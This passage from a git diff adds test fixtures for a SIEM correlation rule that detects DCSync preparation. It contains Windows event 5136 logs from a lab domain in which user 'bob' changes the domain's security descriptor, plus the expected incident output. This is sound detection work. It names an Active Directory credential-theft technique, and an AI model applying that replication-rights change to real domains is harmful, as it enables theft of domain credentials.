4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T16:37:41.039Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-25T21:28:45.023Z", "type": "raw", "uuid": "f28a2057-aea4-4699-968a-f82504a7a7dc"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Account Manipulation", "correlation_name": "DCSync_prepare_Add_replicatation_rights_to_Account", "correlation_type": "incident", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "DCSync_prepare_Add_replicatation_rights_to_Account|dc1.insecurebank.local|s-1-5-21-738609754-2819869699-4189121830-1108", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value added", "object.type": "domainDNS", "object.value": "O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_2.sc new file mode 100644 index 00000000..bfb2d73a --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_2.sc @@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5136\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14081\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-25T21:28:45.0226312Z\"},\"EventRecordID\":\"198242588\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"896\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"OpCorrelationID\",\"text\":\"{2ea9670c-f0f9-4d3f-90e5-a087e8c05863}\"},{\"Name\":\"AppCorrelationID\",\"text\":\"-\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1108\"},{\"Name\":\"SubjectUserName\",\"text\":\"bob\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40f2719\"},{\"Name\":\"DSName\",\"text\":\"insecurebank.local\"},{\"Name\":\"DSType\",\"text\":\"%%14676\"},{\"Name\":\"ObjectDN\",\"text\":\"DC=insecurebank,DC=local\"},{\"Name\":\"ObjectGUID\",\"text\":\"{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"ObjectClass\",\"text\":\"domainDNS\"},{\"Name\":\"AttributeLDAPDisplayName\",\"text\":\"nTSecurityDescriptor\"},{\"Name\":\"AttributeSyntaxOID\",\"text\":\"2.5.5.15\"},{\"Name\":\"AttributeValue\",\"text\":\"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)\"},{\"Name\":\"OperationType\",\"text\":\"%%14675\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "{2ea9670c-f0f9-4d3f-90e5-a087e8c05863}", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5136_A_directory_service_object_was_modified", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5136", "normalized": true, "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value deleted", "object.type": "domainDNS", "object.value": "O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T15:53:16.899Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-25T21:28:45.022Z", "type": "raw", "uuid": "8a459521-d4bd-4b57-b83c-a3e48071b3cd"} +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5136\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14081\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-25T21:28:45.0226312Z\"},\"EventRecordID\":\"198242589\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"2868\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"OpCorrelationID\",\"text\":\"{2ea9670c-f0f9-4d3f-90e5-a087e8c05863}\"},{\"Name\":\"AppCorrelationID\",\"text\":\"-\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1108\"},{\"Name\":\"SubjectUserName\",\"text\":\"bob\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40f2719\"},{\"Name\":\"DSName\",\"text\":\"insecurebank.local\"},{\"Name\":\"DSType\",\"text\":\"%%14676\"},{\"Name\":\"ObjectDN\",\"text\":\"DC=insecurebank,DC=local\"},{\"Name\":\"ObjectGUID\",\"text\":\"{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"ObjectClass\",\"text\":\"domainDNS\"},{\"Name\":\"AttributeLDAPDisplayName\",\"text\":\"nTSecurityDescriptor\"},{\"Name\":\"AttributeSyntaxOID\",\"text\":\"2.5.5.15\"},{\"Name\":\"AttributeValue\",\"text\":\"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)\"},{\"Name\":\"OperationType\",\"text\":\"%%14674\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "{2ea9670c-f0f9-4d3f-90e5-a087e8c05863}", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", 